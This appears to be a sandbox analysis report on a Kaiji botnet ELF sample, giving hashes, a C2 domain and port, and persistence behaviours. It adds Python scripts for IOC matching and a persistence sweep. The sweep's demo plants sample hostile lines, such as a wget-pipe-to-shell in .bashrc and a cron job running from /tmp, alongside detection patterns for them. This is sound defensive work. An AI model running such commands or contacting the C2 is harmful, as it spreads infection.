General

  • Target

    3bd7660e77cbac4a9c8e0d85c03fe144ff34177087dc739e2b66a1293653aeb0.elf

  • Size

    5.1MB

  • Sample

    241109-ypwzla1dnd

  • MD5

    8bd999abd9893c4be18600f481b04ad3

  • SHA1

    10080f79cd6bed96cb3c35e896443c37460b10bf

  • SHA256

    3bd7660e77cbac4a9c8e0d85c03fe144ff34177087dc739e2b66a1293653aeb0

  • SHA512

    81601a5cfa807f87628bc75aa16c7d9a4d052961e33e0423bffd520063fcb399f79ba6594715704e2dc8926989fd1293a5842c8cd08a60f4fed55fb88e519c09

  • SSDEEP

    98304:8cSBHdgN2a7JP97kJru8cYWPAXqDu+60:8cS03Lu+6

Malware Config

Extracted

Family

kaiji

C2

78789.dns.army:7850
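The hashes and C2 above are the indicators a responder would pivot on. The script below is an added example written for this page, not code from the sandbox report or from the Kaiji project: it copies the report's hash and C2 values, hashes a candidate file in one chunked pass, and scans log lines for the C2 host and port. The lines in SAMPLE_LOG and their dnsmasq/netfilter format are constructed assumptions, as are the confidence labels.

```python
"""IOC check for the indicators in the report above.

Added example, not part of the sandbox report or the Kaiji codebase. The hash
and C2 values are copied from the report; SAMPLE_LOG is constructed here, and
its format (dnsmasq query lines plus netfilter-style SRC/DST/DPT lines) is an
assumption about what a responder might have to hand.
"""
import hashlib
import re
import sys
from typing import Dict, Iterable, List

# Hashes from the General section of the report.
REPORT_HASHES: Dict[str, str] = {
    "md5": "8bd999abd9893c4be18600f481b04ad3",
    "sha1": "10080f79cd6bed96cb3c35e896443c37460b10bf",
    "sha256": "3bd7660e77cbac4a9c8e0d85c03fe144ff34177087dc739e2b66a1293653aeb0",
    "sha512": "81601a5cfa807f87628bc75aa16c7d9a4d052961e33e0423bffd520063fcb399f"
              "79ba6594715704e2dc8926989fd1293a5842c8cd08a60f4fed55fb88e519c09",
}
# C2 from the Malware Config section.
C2_HOST = "78789.dns.army"
C2_PORT = 7850


def _digest(chunks: Iterable[bytes]) -> Dict[str, str]:
    """Feed every chunk to all four algorithms in a single pass over the data.
    (hashlib.new("md5") raises on FIPS-mode hosts; drop it there.)"""
    hashers = {name: hashlib.new(name) for name in REPORT_HASHES}
    for chunk in chunks:
        for h in hashers.values():
            h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}


def hash_bytes(data: bytes) -> Dict[str, str]:
    return _digest([data])


def hash_file(path: str, chunk_size: int = 1 << 20) -> Dict[str, str]:
    """Hash a file without loading it whole (the sample is 5.1 MB, others may be larger)."""
    with open(path, "rb") as fh:
        return _digest(iter(lambda: fh.read(chunk_size), b""))


def matching_algorithms(computed: Dict[str, str]) -> List[str]:
    """Which of the report's digests the computed set agrees with. Anything short
    of all four agreeing is a mismatch worth investigating, not a partial hit."""
    return [name for name, value in REPORT_HASHES.items() if computed.get(name) == value]


# Constructed log lines (not from the report): one DNS query and two forwarded
# connections as a dnsmasq/netfilter gateway might log them.
SAMPLE_LOG = [
    "Nov  9 12:01:02 gw dnsmasq[412]: query[A] 78789.dns.army from 10.0.0.5",
    "Nov  9 12:01:03 gw kernel: FWD IN=eth1 OUT=eth0 SRC=10.0.0.5 DST=198.51.100.23 PROTO=TCP DPT=7850",
    "Nov  9 12:03:14 gw kernel: FWD IN=eth1 OUT=eth0 SRC=10.0.0.7 DST=192.0.2.10 PROTO=TCP DPT=443",
]

_DPT_RE = re.compile(r"\bDPT=(\d+)\b")
# Match the C2 name (and subdomains of it) but not a longer label that merely ends in it.
_HOST_RE = re.compile(r"(?<![\w-])" + re.escape(C2_HOST) + r"(?![\w-])", re.IGNORECASE)


def c2_hits(lines: Iterable[str]) -> List[dict]:
    """Flag lines naming the C2 host (high confidence) or a connection to its
    port (low confidence: tcp/7850 alone is not distinctive, so pivot on the
    address the DNS hit resolved to before acting on a port-only match)."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        if _HOST_RE.search(line):
            hits.append({"line": lineno, "indicator": C2_HOST, "confidence": "high"})
            continue
        m = _DPT_RE.search(line)
        if m and int(m.group(1)) == C2_PORT:
            hits.append({"line": lineno, "indicator": f"tcp/{C2_PORT}", "confidence": "low"})
    return hits


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print("matches report:", matching_algorithms(hash_file(sys.argv[1])) or "none")
    for hit in c2_hits(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['indicator']} ({hit['confidence']} confidence)")
```

Run it with the path of a suspect ELF to confirm it is the same sample as the report; without an argument it only walks the constructed log lines.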

Targets

    • Target

      3bd7660e77cbac4a9c8e0d85c03fe144ff34177087dc739e2b66a1293653aeb0.elf

    • Kaiji

      Kaiji payload

    • Kaiji family

    • kaiji_chaosbot

      Chaos-variant payload

    • Executes dropped EXE

      Runs a file that the sample itself wrote to disk.

    • Modifies Watchdog functionality

      Malware like Mirai disables the hardware watchdog timer (opened through /dev/watchdog) so that the device is not rebooted out from under the infection.

    • Creates/modifies Cron job

      Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    • Creates/modifies environment variables

      Variables written to files that shells read at startup (for example /etc/environment or /etc/profile.d/*) take effect in every new session, so this is a common persistence mechanism, e.g. prepending an attacker-controlled directory to PATH.

    • Enumerates running processes

      Discovers information about currently running processes on the system.

    • Modifies init.d

      Adds/modifies system service, likely for persistence.

    • Write file to user bin folder

    • Modifies Bash startup script

      Bash reads /etc/profile, ~/.profile and ~/.bashrc when a user logs in or opens a shell, so a command added there is re-launched on every login.
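The signatures above name the persistence locations to check on a suspect host. The sweep below is an added example written for this page, not part of the sandbox report or of the Kaiji code. The locations follow the signature names (cron, init.d, Bash startup scripts, environment files); the heuristics for flagging an entry (execution from /tmp, /var/tmp or /dev/shm, download-and-run pipes, every-minute cron entries), the choice of /etc/environment and /etc/profile.d for the "environment variables" signature, and the artifacts that demo() plants are all assumptions made here.

```python
"""Host sweep for the persistence mechanisms flagged in the report above.

Added example, not from the sandbox report or the Kaiji codebase. Locations
follow the signature names; the heuristics and the artifacts planted by
demo() are constructed assumptions. Point sweep() at "/" on a live host or at
the mount point of a disk image.
"""
import os
import re
import sys
import tempfile
from pathlib import Path

# Globs relative to the filesystem root, grouped by the report signature they serve.
LOCATIONS = {
    "cron": ["etc/crontab", "etc/cron.d/*", "var/spool/cron/*",
             "var/spool/cron/crontabs/*", "etc/cron.hourly/*", "etc/cron.daily/*"],
    "init.d": ["etc/init.d/*", "etc/rc.local"],
    "bash startup": ["etc/profile", "etc/bash.bashrc", "etc/bashrc", "etc/profile.d/*",
                     "root/.bashrc", "root/.profile", "home/*/.bashrc",
                     "home/*/.profile", "home/*/.bash_profile"],
    "environment": ["etc/environment"],
}
# (reason, regex, categories it applies to or None). Heuristics, not report-derived.
SUSPICIOUS = [
    ("exec from temp dir", re.compile(r"(^|[\s=;|&'\"])(/tmp|/var/tmp|/dev/shm)/\S+"), None),
    ("download-and-run", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), None),
    ("every-minute cron", re.compile(r"^\s*\*\s+\*\s+\*\s+\*\s+\*\s+"), {"cron"}),
]
WATCHDOG_DEVICES = {"/dev/watchdog", "/dev/watchdog0", "/dev/misc/watchdog"}


def iter_startup_files(root):
    root = Path(root)
    for category, patterns in LOCATIONS.items():
        for pattern in patterns:
            for path in sorted(root.glob(pattern)):
                if path.is_file():
                    yield category, path


def sweep(root):
    """One finding per non-comment line that trips a heuristic, first rule wins."""
    findings = []
    for category, path in iter_startup_files(root):
        try:
            lines = path.read_text(errors="replace").splitlines()
        except OSError:
            continue
        for lineno, line in enumerate(lines, 1):
            if not line.strip() or line.lstrip().startswith("#"):
                continue
            for reason, pattern, categories in SUSPICIOUS:
                if (categories is None or category in categories) and pattern.search(line):
                    findings.append({"category": category, "file": str(path), "line": lineno,
                                     "reason": reason, "text": line.strip()})
                    break
    return findings


def watchdog_holders(proc="/proc"):
    """PIDs holding the hardware watchdog device open (live host only; needs root
    to see other users' fds). A real watchdog daemon belongs here, an unknown
    process does not."""
    holders = []
    if not os.path.isdir(proc):
        return holders
    for entry in os.scandir(proc):
        if not entry.name.isdigit():
            continue
        fd_dir = os.path.join(entry.path, "fd")
        try:
            links = [os.readlink(os.path.join(fd_dir, fd)) for fd in os.listdir(fd_dir)]
        except OSError:
            continue
        if WATCHDOG_DEVICES.intersection(links):
            holders.append(int(entry.name))
    return holders


def demo():
    """Plant constructed artifacts (one benign init script, three bad entries)
    in a throwaway root and sweep it. Test scaffolding, not real data."""
    planted = {
        "etc/crontab": "SHELL=/bin/sh\n17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
                       "* * * * * root /tmp/.x/bot >/dev/null 2>&1\n",
        "etc/init.d/ssh": "#!/bin/sh\n# Provides: sshd\nexec /usr/sbin/sshd\n",
        "etc/profile": "export PATH\nnohup /dev/shm/.s/payload &\n",
        "home/alice/.bashrc": "alias ll='ls -l'\nwget -q -O- http://198.51.100.23/i.sh | sh\n",
        "etc/environment": 'PATH="/usr/local/bin:/usr/bin:/bin"\n',
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, content in planted.items():
            target = Path(tmp) / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(content)
        return sweep(tmp)


if __name__ == "__main__":
    results = sweep(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for f in results:
        print(f"[{f['category']}] {f['file']}:{f['line']} {f['reason']}: {f['text']}")
    if len(sys.argv) > 1:
        print("watchdog held by PIDs:", watchdog_holders() or "none")
```

Without an argument it runs the planted demo; with a root path it sweeps that tree and, on a live host, reports which processes hold the watchdog device. A finding is a lead, not a verdict: package-owned init scripts and cron entries will appear in the same files and must be triaged by content.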
